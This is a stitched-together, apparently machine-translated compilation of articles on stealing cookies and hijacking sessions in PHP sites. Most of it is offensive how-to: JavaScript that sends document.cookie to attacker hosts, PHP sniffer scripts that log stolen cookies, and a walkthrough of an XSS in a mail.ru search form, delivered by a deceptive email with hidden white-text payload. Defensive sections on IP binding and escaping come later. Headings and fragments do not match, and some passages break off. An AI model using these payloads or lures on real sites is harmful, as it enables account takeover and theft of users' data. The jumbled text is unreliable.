Safe programming in PHP: session theft and methods for stealing cookies

A friend of mine forgot the password to a site. However, he had previously ticked the "Remember me" box in Google Chrome when logging in, which still let him into the site under his account. He asked me whether this magical state could be transferred to another computer. The correct thing, of course, would be to change or recover the password, but my acquaintance could not do that for reasons unrelated to the matter.

How to use intercepter-ng for dummies

Despite the wide choice of modern software, it is hard to find an Android hacking program better than Intercepter-NG. The first criterion in favour of this product is that it actually works: most of the sniffers offered on the net are only imitations that do not perform the functions they claim.

The next positive factors are the versatility of the application and its coverage of a wide audience of users.


Let's start from the beginning. Cookies are very small text files, bookmarks with information.

The web server sends this information to the user's browser, where it is stored until it is required. Not quite clear? Well, I'll try to make it even simpler. Say you have registered on some site.

At the moment of registration, these very cookies are created.

Here they are.

Cookie Cadger

The program listens to traffic on a WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Its author, Matthew Sullivan, presented the program on September 30 at the Derbycon hacker conference. Right during the talk, Matthew Sullivan intercepted the unsecured Google session of one of the conference attendees over WiFi.

How to steal cookies

If, while on a page of the site, you enter the following text into the address bar of your Firefox or Opera browser: javascript:document.write(document.cookie); you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remix description=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0

The Complete Guide to Cross-Site Scripting

XSS is a type of software vulnerability native to Web applications that allows an attacker to inject client-side script into web pages viewed by other users. Wikipedia gives the following definition: "Cross-site scripting (XSS) is a type of software vulnerability native to Web applications (by bypassing browser security restrictions) which allows an attacker to inject client-side script into web pages viewed by other users."

Difference between cookies and sessions

Not so long ago I wrote an article on how to register and authorize users on a site.

In this article I am going to break down the difference between sessions and cookies, so that you can make your final choice.

Cookies. No, this is not about baked cookies, it is about your safety. Say you go to your favourite site "vkontakte" (or, for example, check your mail) on someone else's computer, decline the "save password" option, happily look through your mail and leave. And you do not think about the fact that someone can now log in to the social network or the mail under your name.

I am not even considering the case of a program that remembers a password without your knowledge. That is already a deliberate hack; you would probably suspect that something like that could happen and would not log in to your favourite site on such a computer. But we can talk about simple human curiosity: you were visiting friends, and suddenly they have the opportunity to read your mail. Are you sure they would pass up such an opportunity? Aren't you afraid that something will come up? In any case, I will put moral questions aside and just talk about how the information that lets you into some site without asking for a password is stored on the computer.


And the name of this technology is cookies.

And this is where it all started. The HTTP protocol, over which you actually browse sites (including this one), did not originally provide any way to maintain state between requests. Roughly speaking, you send a request to the site, get a response, it is displayed on the screen, and after that the server remembers nothing about you. Of course, that is fine when the site is purely informational and should not remember anything about you, but we live in the Web 2.0 age 😉 The natural development of the protocol was POST and GET requests, where you send some data and the server can write it to a database, but that is not enough.

Let's look at a very simple example: a forum. You registered, so the forum has a record that there is such and such a user with such and such a password and some other data. Now you go to the forum and log in, entering your password. Somewhere there must be information that you are logged in. On the server? Of course not! The server cannot record that the authorization was made from your computer: it would not be able to tell you apart from someone else (even your IP address does not uniquely identify you)! So the information that authorization has taken place must be stored on your computer. That is what cookies are for; that is why they were created.

A cookie is a small record on your computer that stores information about the site you have visited. Upon authorization, a similar entry is created, after which you can already walk around the forum, and it will recognize you. However, this will already happen automatically - thanks to the information stored in the cookie - so pretending that you are the main administrator of the forum will still not work bypassing the password verification.

Now we can return to where this article began. If you logged in somewhere without even saving your password, it may be that an entry was created on that computer which now allows entering the resource under your name without authorization. Such an entry becomes obsolete by itself after a while, but you can force it to be cleared. Each browser does this differently; I'll show how it is done in my favourite Google Chrome. Open the options:

Go to the "Advanced" tab and find the "Show cookies" button.

Now, of course, you could delete all cookies, but that may upset the computer's owner. Instead, in the upper field you can enter the name of the site you are interested in.

Then only the cookies related to this site will be cleared. You can try it on mine: if you log in to my forum and then clear the cookies, the authorization will be forgotten. Try it!


1. What is XSS
An XSS vulnerability allows arbitrary JavaScript code to be inserted into the body of a page. An XSS attack differs from others (e.g. SQL injection or PHP injection) in that it acts not on the server but on the client.


With its help you cannot view database tables, upload a shell, etc. The most common use of XSS is stealing cookies.
Cookies are a small piece of data created by a web server and stored on the user's computer as a file. Typically cookies are used to store accounts, and most often they contain an encoded password, a login and a session ID (though not always).
XSS comes in two types: active and passive.

Passive XSS requires the victim to participate directly, for example by following a link containing JavaScript code. With this type of XSS you cannot do without SE (social engineering).

Active XSS does not require any participation from the victim; it is enough to open the page containing the XSS. Active XSS can sit, for example, in forum posts, chats, news submissions, etc.

2. Searching for XSS
In this section I will tell you how to find XSS.

2.1 Passive XSS
To find passive XSS, just substitute the test script into an input form: if the script ran and the message "xss" appeared, the vulnerability is present. If the script did not run, you can still try the variant prefixed with ">, which is probably the most common XSS case. If neither script worked, there is most likely no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
See the "search" form? Put "> in there and click "find".
A window with "xss" popped up, which means XSS is present. (Perhaps by the time you read this article, this XSS will already be fixed.)

2.2 Active XSS
Such XSS can be found, for example, in profile fields, in the title and (less often) the body of news submissions, and in messages on forums/chats/guestbooks with HTML enabled. Everything is simple here: enter the script from the previous subsection into the fields, and if the message appears on the screen, the vulnerability is present.
Consider XSS in BB tags on forums.
You can try simply inserting JavaScript code into the tag, like this:
javascript:alert('xss')
Some tags have parameters; for example, the image tag has dynsrc and lowsrc parameters, so let's try substituting the code like this:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
If the script worked, XSS is present.

3. Using XSS to steal cookies
Now the most delicious part.
In order to steal cookies we need a web sniffer; you can install some sniffer on your hosting, or use one of the many online sniffers.
To steal cookies through passive XSS, the victim needs to follow a poisoned link. Instead of the alert, we use another script:
We substitute the script into the link, let the victim follow it, look at the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on the rambler from the previous paragraph.
Paste
">
in the search form, click "find", look at the address bar and see:

http://miss.rambler.ru/srch/?sort=0& … &words =">
We throw this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to URL-encode
">
or use a service like http://tinyurl.com/
Let's move on to active XSS. Everything is simple here: instead of alert() we insert img = new Image(); img.src = "sniffer image address" + document.cookie;

Now we have the cookies. But what to do with them? It's simple: substitute them for your own. The Opera browser has a built-in cookie editor (Tools -> Advanced -> Cookie management); there is a plugin for Firefox (I don't remember the name, use Google).
That's all for now; perhaps the article will be supplemented.

What is a cookie?

There is a mechanism that allows an HTTP server to store some textual information on the user's computer and later read it back. This information is called a cookie. Each cookie is a pair: a parameter name and its value. Each cookie is also assigned the domain it belongs to; for security, all browsers allow an HTTP server to access only the cookies of its own domain. Additionally, a cookie may have an expiration date, in which case it is kept on the computer until that date even if all browser windows are closed.


Why are cookies important?

In all multi-user systems, cookies are used to identify the user, or rather the user's current connection to the service, the user session. If someone learns your cookies, they can log in on your behalf, because at the moment very few Internet resources check whether the IP address changes during a single user session.


How to view or change cookies?

Browser developers do not provide built-in tools for editing cookies. But you can get by with a plain text editor (Notepad).


Step 1: create a text file with the following text

Windows Registry Editor Version 5.00



@="C:\\IE_ext.htm"

Save it under the name IE_ext.reg.

Step 2: Using the created file, apply the changes to the Windows registry.

Step 3: create a text file with the following text

<script language="javascript">
// Internet Explorer only: external.menuArguments is the document the context menu was opened on
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);
alert(external.menuArguments.document.cookie); // current cookies, before the change
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie); // cookies after the change
</script>


Save it as C:\IE_ext.htm

Step 4: We go to the website of interest to us.

Step 5: Right-click on an empty area of the page and choose the "Working with Cookies" menu item. Allow access to the clipboard. Your cookies for this site are now on the clipboard; you can paste them into Notepad and look at them.


Step 6: To change a cookie, edit the file C:\IE_ext.htm, replacing testname with the cookie's name, testvalue with its value, and testdomain.ru with the site's domain. Add more such lines if necessary. For convenience of checking, I added output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);

Step 7: Run Step 5 again and then refresh the page.

Bottom line: we will go to this Internet resource with updated cookies.

How to steal cookies with JavaScript?

If an attacker has found a way to execute an arbitrary JavaScript script on the victim's computer, reading the current cookies is very easy. Example:


var str = document.cookie;

But can he transfer them to his own site, given that, as I pointed out earlier, a JavaScript script cannot access a site in another domain without additional confirmation? It turns out that a JavaScript script can load any image from any HTTP server, and at the same time pass arbitrary text in the request for that image. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:

var img = new Image();

img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);


then the cookies will be in the request to download the "picture" and "leave" to the attacker.

How to handle such requests to upload a "picture"?

An attacker only needs to find hosting with PHP support and place code like this there:

<?php
$uid = urldecode($_SERVER["QUERY_STRING"]);
$fp = fopen("log.txt", "a");
fputs($fp, "$uid\n");
fclose($fp);
?>

Then all query parameters sent to this script are saved in the file log.txt. It only remains to replace http://hackersite.ru/xss.jpg in the JavaScript above with the path to this PHP script.


Outcome

I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.
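As an added example (not code from the article), here is how a PHP application can issue its session cookie so that the document.cookie read and the Image() exfiltration described above yield nothing useful, together with a small checker for Set-Cookie headers; it assumes PHP 7.3 or newer, and the sample header strings are constructed.

```php
<?php
// Added example, not the article's code: issue the PHP session cookie with
// attributes that defeat the document.cookie / Image() trick and the ?sid=
// link leak, plus an audit helper for Set-Cookie headers.
// Assumes PHP 7.3 or newer (array form of session_set_cookie_params()).

// Cookie attributes: HttpOnly hides the cookie from JavaScript (document.cookie
// no longer contains it), Secure keeps it off cleartext HTTP that a sniffer
// could read, SameSite=Strict stops the browser sending it on cross-site
// navigation. An empty domain restricts the cookie to the issuing host.
function hardened_cookie_params(): array
{
    return [
        'lifetime' => 0,        // session cookie: gone when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ];
}

// Start the session so that the SID is only ever taken from the cookie
// (never from the address bar) and only server-issued SIDs are accepted.
function start_hardened_session(): void
{
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_strict_mode', '1');
    session_set_cookie_params(hardened_cookie_params());
    session_start();
}

// Audit helper: given a Set-Cookie header value (for instance from a
// response capture), report which protective attributes are present.
function set_cookie_flags(string $header): array
{
    $attrs = array_map('trim', explode(';', $header));
    array_shift($attrs);                       // drop the name=value pair
    $lower = array_map('strtolower', $attrs);
    return [
        'httponly' => in_array('httponly', $lower, true),
        'secure'   => in_array('secure', $lower, true),
        'samesite' => count(preg_grep('/^samesite=(strict|lax)$/', $lower)) > 0,
    ];
}

// Constructed sample headers for the checker.
$weak = 'PHPSESSID=abc123; path=/';
$good = 'PHPSESSID=abc123; path=/; secure; HttpOnly; SameSite=Strict';
print_r(set_cookie_flags($weak)); // httponly, secure, samesite all false
print_r(set_cookie_flags($good)); // all three true
```

With HttpOnly set, the injected script's document.cookie still lists non-session cookies, so the flag protects the SID specifically, not every value the site stores.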

In which it was proposed to attend a free event on information security. Since the event was held in my city, I decided I had to go. The first lesson was devoted to website vulnerabilities such as XSS. After the lesson I decided I needed to consolidate the knowledge in real conditions. I picked several sites related to my city and started trying to insert my script into every form. In most cases the script was filtered out. But sometimes the "alert" fired and my message appeared. I reported the vulnerabilities I found to the administrators, and they quickly fixed everything.

On one of those days, while checking fresh mail on mail.ru, I came across a form for searching letters in the mailbox. Occasionally I used this search to find something I needed in a pile of my old letters. Well, since in the last couple of days I have inserted my “alert” almost everywhere I could, my hand reflexively reached for this search form. I typed my script code and pressed Enter. Imagine my surprise when I saw a painfully familiar message on the screen ...


At the Open InfoSec Days lecture, the speaker said that programmers are rather skeptical about vulnerabilities of this kind, they say, “alert? Well, so what? This is not dangerous". If on other sites I was content with only this window with my message, then in this case I decided to go further and show what could come of such an “alert”.

So, the script works, which means there is a vulnerability. Therefore, you can try to run some other script. For example, a script that passes another user's cookies to us. For the script to work, we need to force the user to execute our script. This can be done by sending him a letter with the appropriate link, after clicking on which the mailbox will be searched and the code we need will be executed.

It took some time and a lot of experimenting to understand the mechanics of the vulnerability. Sometimes the script worked, sometimes it was filtered out. After some effort it was found empirically that the script works 100% only when the letter search returns a positive result. That is, when a user performs a search containing our script, at least one letter in his mailbox must match the given parameters. That is not hard to arrange.

<?php
if (isset($_GET["cookie"]))
{
    $text = "New cookie accept from " . $_SERVER["REMOTE_ADDR"] . " at " . date("l jS \of F Y h:i:s A");
    $text .= "\n" . str_repeat("=", 22) . "\n" . $_GET["cookie"] . "\n" . str_repeat("=", 22) . "\n";
    $file = fopen("sniff.txt", "a");
    fwrite($file, $text);
    fclose($file);
}
?>

Also, instead of an "alert", we need a script that will pass the cookies to our sniffer. We will write this script in a separate file and upload it to our hosting. I created a test.js file with the necessary code and uploaded it. The script code is this:

var img = new Image();
img.src = "http://sitename.ru/sniff.php?cookie=" + document.cookie;
function F() {
    location = "http://www.solife.ru";
}
setTimeout(F, 5000);

What I would like to explain here. Let's put ourselves in the attacker's place. The user needs to click the link. How do we make him do it? You can promise mountains of gold, obtainable only by following our link to the site. But I don't think that will work; people no longer fall for that (I myself constantly delete such letters without even reading them). So we will play on human pity, since it still exists in nature. We will ask the user to vote on a site for saving endangered animals. First we take the cookies, then we redirect the user to the voting site. The redirect timeout was set to 5 seconds, because otherwise the cookies simply did not have time to reach the sniffer before the user was taken to the animal site. Instead of "alert" I used the following script:

When the scripts were finished, I started writing a letter. Came up with the following content:


It turned out quite cynically, but I tried to bring the conditions closer to the most realistic. At the end of the letter, a line with a script has been added, this is so that our letter will be found when we do a search. So that the line does not cause unnecessary questions, I painted it in white. I also put a space in the word "http" so that the string is not recognized and converted into a link. Otherwise, despite the fact that the script line is written in white font, the link would be highlighted in blue at the addressee, and we do not need this. Smart search will still find and recognize this string, regardless of the spaces.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

For the script, I applied URL encoding so that nothing was filtered out. I also added the “q_folder=0” parameter for the search, so that the search takes place in the Inbox folder.

The letter is ready, we send it. I used my second mailbox on the same service as the addressee. We look at what came to the other box.

Our script text is not visible as it blends into the background. Let's click on the link and see what happens. The user is moved to the search results for emails by the parameter we set. Our letter that we sent is visible in the search results. At this time, our script has already worked and sent the user's cookies to the sniffer. After 5 seconds (the time depends on the script settings), the user is redirected to the voting site.

I check my sniff.txt file:

Since my goal is not to steal other people's mailboxes or gain access to them, I will end the story here. But in theory you could replace your cookies with someone else's and gain access to someone else's mailbox. In general, if an attacker has set his sights on a target, he will find a use for the information obtained.

I would like to thank Sergey Belov (

  1. The user is prompted for a username and password.
  2. If authorization succeeds, a new session is created, with the value "authorization successful".
  3. The user is assigned a unique identifier (SID), which cannot be predicted in advance and therefore cannot be guessed :).
  4. The SID is recorded either in the browser's cookies or transmitted via the browser's address bar (if cookies are disabled).

As a result of successful authorization, the script gets access to the values of variables in the $_SESSION superglobal array, and based on their presence it grants access to some resource, for example the site's administration panel.

The problem is that if an attacker somehow learns the SID of another user, he can substitute it in his cookies, or the address bar of the browser and enter the site with the rights of this user.

Comment

There were several scandals a few years ago where remote bank account management systems generated a unique number (SID) simply by adding one to the last used value. Quick authorization resulted in the issuance of two SID values, let's say 40346 and 40348. Substituting the number 40347 allowed access to someone else's account :).

Currently the SID is a unique sequence of digits and letters that is not tied to a counter. But how does an attacker find out someone else's SID?

There are two most common options:

1. For example, the owner of the session himself showed it, inadvertently leaving a link of this type somewhere on the forum or guestbook.

http://forum.dklab.ru/?sid=

Going to this address automatically grants the attacker the rights of the user for whom the session with the identifier is allocated.
Of course, the user session is destroyed after some period of inactivity, so the attacker has to hurry :). On the other hand, the ubiquity of spiders (web crawlers) makes it possible to organise a purposeful automatic search for such links.

2. Even if the session is not shown explicitly in the address bar but is stored in cookies, an attacker still has a way to obtain the identifier. Consider a small script for the simplest guest book.



The form has a single field, Text:, which is posted to the addmsg.php handler shown below.

<?php
if (!empty($_POST["text"]))
{
    // collapse line breaks into spaces
    $line = preg_replace("/\r?\n/", " ", $_POST["text"]);
    // write to database or file (no htmlspecialchars() here: this is the flaw discussed below)
}
else
{
    exit("Error");
}
?>

Note that the script clearly omits a call to htmlspecialchars(), which converts the characters <, >, & and quotes into HTML entities. As a result, an attacker can insert arbitrary HTML tags and JavaScript into the text.

And what do we get? A small oversight (apparently just a missing htmlspecialchars() before the message is displayed in the browser) that allows the attacker's page to be loaded in a new window and handed the values from the cookies.
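As an added example (not the article's code), the guestbook's storage step is shown beside a vulnerable and a hardened way of displaying the stored message, plus a heuristic for flagging already-stored entries that contain markup; the sample post is constructed.

```php
<?php
// Added example, not the article's code: the guestbook above collapses
// newlines but never escapes the text. Same storage step, then the
// vulnerable and the hardened render, then a check for stored entries.

// Normalise the posted text the way addmsg.php does (collapse line breaks).
function store_message(string $text): string
{
    return preg_replace("/\r?\n/", " ", $text);
}

// What the article's guestbook effectively does when it shows a message:
// the stored text is echoed into the HTML as-is, so any tag in it runs.
function render_vulnerable(string $line): string
{
    return "<div class=\"msg\">" . $line . "</div>";
}

// Hardened version: htmlspecialchars() with ENT_QUOTES turns <, >, &, " and '
// into entities, so the browser shows the text instead of interpreting it.
function render_safe(string $line): string
{
    return "<div class=\"msg\">"
        . htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . "</div>";
}

// Heuristic for auditing messages already in the database: flag entries
// containing a tag, an on*= handler or a javascript: URL, which the escape
// step would have neutralised had it been in place.
function looks_like_markup(string $line): bool
{
    return (bool)preg_match('/<\s*\/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i', $line);
}

// Constructed sample post resembling the one the article describes.
$posted = "hello\r\n<script>alert('xss')</script>";
$stored = store_message($posted);

echo render_vulnerable($stored), "\n"; // the <script> tag survives intact
echo render_safe($stored), "\n";       // <div class="msg">hello &lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;</div>
var_dump(looks_like_markup($stored));  // bool(true)
```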
To deal with vulnerabilities of this kind, it is best to use "robust" methods that work on the principle "everything not allowed is forbidden". You should not hide the SID and subject the text to multi-stage checks: that only increases the likelihood of mistakes. More reliable in this case is binding the SID to the IP address of the user who owns the session. This method is widely used in many well-known forums, such as phpBB.
Authorization script

<?php
session_start();
if (credentials_valid($login, $password)) // stands for "login and password are correct"
{
    $_SESSION["authorized"] = true;
    $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
}
?>

Then the script that grants access to a specific resource might contain the following code

<?php
session_start();
if (!empty($_SESSION["authorized"]) &&
    $_SESSION["ip"] == $_SERVER["REMOTE_ADDR"])
{
    // Access to the resource is open.
}
else die("Access denied.");
?>

That is, now only the user whose IP address matches the one sent to the server during authorization can work with this session. If an attacker intercepts the session, he has a different IP address :) and so is denied access.

This method is not universal and it also has weaknesses.

  1. If the user and the attacker access the Internet through a common proxy server, then they will have one common IP address (this is typical for networks of universities, factories and other large institutions), i.e. everyone can steal a neighbor's SID, at least by the above methods.
  2. If the user is using a modem and the connection is interrupted, then after the connection is restored, he will most likely be assigned a different IP address. The user may be unpleasantly surprised if he is indiscriminately enrolled in the ranks of intruders (therefore, it is not worth writing threats and appeals to conscience in protection systems - such systems also have errors). The last drawback occurs in forums, whose visitors have a habit of turning off the Internet and working offline when typing a long answer. Pressing the "Reply" button leads to the fact that all the typed information is lost, since no one cares about saving the text typed by the attacker :))).

A way out (or rather a half-way out): compare only the first three octets of the IP address. SID theft remains statistically unlikely, but in most cases this is more forgiving of dropped connections, since providers are usually allocated a contiguous range of IP addresses in which only the last octet changes.
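As an added example (not the article's code), the IP-binding scheme from the two scripts above and its "first three octets" relaxation are written as functions; it also regenerates the SID at login, which the article's scripts do not do. credentials_valid() is a placeholder for the real password check, and the addresses in the walk-through are constructed. The shared-proxy weakness from point 1 still applies: everyone behind one proxy shares the prefix.

```php
<?php
// Added example, not the article's code: bind the session to the client's
// /24 prefix at login and check it on every protected request.

// Placeholder for the real credential check ("login and password are correct").
function credentials_valid(string $login, string $password): bool
{
    return $login === 'demo' && $password === 'demo'; // constructed stand-in
}

// Reduce an IPv4 address to its first three octets: 203.0.113.7 -> 203.0.113
// IPv6 clients are compared on the full address (the /24 relaxation does not apply).
function ip_prefix(string $ip): string
{
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        return implode('.', array_slice(explode('.', $ip), 0, 3));
    }
    return $ip;
}

// Authorisation: on success rotate the SID, then bind the session to the client.
// $session is $_SESSION in a real request; an array is passed here so the
// walk-through at the bottom can run from the command line.
function login(array &$session, string $login, string $password, string $remote_addr): bool
{
    if (!credentials_valid($login, $password)) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true); // a SID observed before login is useless after it
    }
    $session['authorized'] = true;
    $session['ip'] = $remote_addr;
    return true;
}

// Access check for protected scripts: authorised AND same /24 as at login.
function session_valid(array $session, string $remote_addr): bool
{
    return !empty($session['authorized'])
        && isset($session['ip'])
        && ip_prefix($session['ip']) === ip_prefix($remote_addr);
}

// Constructed walk-through with documentation-range addresses.
$s = [];
login($s, 'demo', 'demo', '203.0.113.7');
var_dump(session_valid($s, '203.0.113.7'));   // true: same address
var_dump(session_valid($s, '203.0.113.200')); // true: reconnected inside the same /24
var_dump(session_valid($s, '198.51.100.7'));  // false: stolen SID used from another network
```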

Cookies - information in the form of a text file, stored on the user's computer by the website. Contains authentication data (login/password, ID, phone number, mailbox address), user settings, access status. Stored in the browser profile.

Cookie hack is the theft (or "hijacking") of a visitor's session to a web resource. Secret information becomes available not only to the sender and recipient, but also to a third party - the person who intercepted.

Cookie Hacking Tools and Techniques

Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, also have their own tools - a kind of arsenal of master keys and probes. Let's get acquainted with the most popular tricks of hackers, which they use to fish out cookies from the inhabitants of the Internet.

Sniffers

Special programs for monitoring and analysing network traffic. Their name comes from the English verb "sniff", because they literally sniff out the packets transmitted between nodes.

But attackers use a sniffer to intercept session data, messages, and other confidential information. The object of their attacks are mostly insecure networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable.)

To insert a sniffer into the Internet channel between the user's host and the web server, the following methods are used:

  • "listening" to network interfaces (hubs, switches);
  • branching and copying traffic;
  • connection to the break of the network channel;
  • analysis through special attacks that redirect victim traffic to a sniffer (MAC-spoofing, IP-spoofing).

The abbreviation XSS stands for Cross Site Scripting. It is used to attack websites in order to steal user data.

The way XSS works is as follows:

  • an attacker injects malicious code (a special disguised script) onto a web page of a website, forum, or into a message (for example, when chatting on a social network);
  • the victim visits the infected page and activates the installed code on his PC (clicks, follows a link, etc.);
  • in turn, the activated malicious code "extracts" the user's confidential data from the browser (in particular, cookies) and sends them to the attacker's web server.

In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.

All XSS vulnerabilities are divided into two types:

  • Passive. The attack is triggered by a request to a specific page script. Malicious code can be injected into various forms on a web page (for example, into a site's search bar). Resources that do not filter HTML tags in incoming data are the most susceptible to passive XSS;
  • Active. Located directly on the server and activated in the victim's browser. Widely used by scammers in blogs, chats and news feeds.

Hackers carefully “camouflage” their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate them to follow the link, attract them with interesting content. As a result: a PC user who has not coped with his own curiosity, with his own hand (with a mouse click) sends session cookies (with a login and password!) To the author of the XSS script - a computer villain.

Cookie spoofing

All cookies are stored and sent back to the web server they came from unchanged, in their original form, with the same values, strings and other data. Deliberate modification of their parameters is called cookie spoofing. In other words, by spoofing a cookie the attacker passes off the desired as the actual. For example, when paying in an online store, the payment amount in the cookie is changed to a smaller one, and the purchase is thus made "cheaper".

Session cookies stolen from someone else's social network account are "inserted" into another session on another PC. The owner of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) for as long as the victim's own session remains open.

"Editing" cookies is carried out using:

  • functions "Manage cookies ..." in the Opera browser;
  • the Cookies Manager and Advanced Cookie Manager add-ons for Firefox;
  • IECookiesView utilities (for Internet Explorer only);
  • text editor such as AkelPad, NotePad or Windows Notepad.

Physical access to data

A very simple scheme for implementation, consists of several steps. But it is effective only if the victim's computer with an open session, for example, Vkontakte, is left unattended (and for quite a long time!):

  1. A javascript function is entered into the address bar of the browser, displaying all saved cookies.
  2. After pressing "ENTER" they all appear on the page.
  3. Cookies are copied, saved to a file, and then transferred to a flash drive.
  4. On another PC, cookies are being replaced in a new session.
  5. Access to the victim's account is opened.

As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are overly naive).

XSS + sniffer

  1. An XSS script is created, which specifies the address of the online sniffer (of its own production or a specific service).
  2. The malicious code is saved with the .img extension (picture format).
  3. Then this file is uploaded to the site page, chat, or personal message - where the attack will be carried out.
  4. The user's attention is drawn to the created "trap" (here social engineering comes into play).
  5. If the "trap" works, cookies from the victim's browser are intercepted by the sniffer.
  6. The cracker opens the sniffer logs and extracts the stolen cookies.
  7. Then it performs a substitution to obtain the rights of the account owner using the above tools.

Protecting cookies from hacking

  1. Use an encrypted connection (using appropriate protocols and security methods).
  2. Do not respond to dubious links, pictures, tempting offers to get acquainted with the "new free software". Especially from strangers.
  3. Use only trusted web resources.
  4. End an authorized session by pressing the "Logout" button (and not just close the tab!). Especially if the account was logged in not from a personal computer, but, for example, from a PC in an Internet cafe.
  5. Do not use the "Save Password" feature of your browser. Stored registration data increases the risk of theft at times. Do not be lazy, do not spare a few minutes of time to enter a password and login at the beginning of each session.
  6. After web surfing - visiting social networks, forums, chats, sites - delete saved cookies and clear the browser cache.
  7. Update browsers and antivirus software regularly.
  8. Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
  9. Periodically in accounts.

And most importantly - do not lose vigilance and attention while relaxing or working on the Internet!
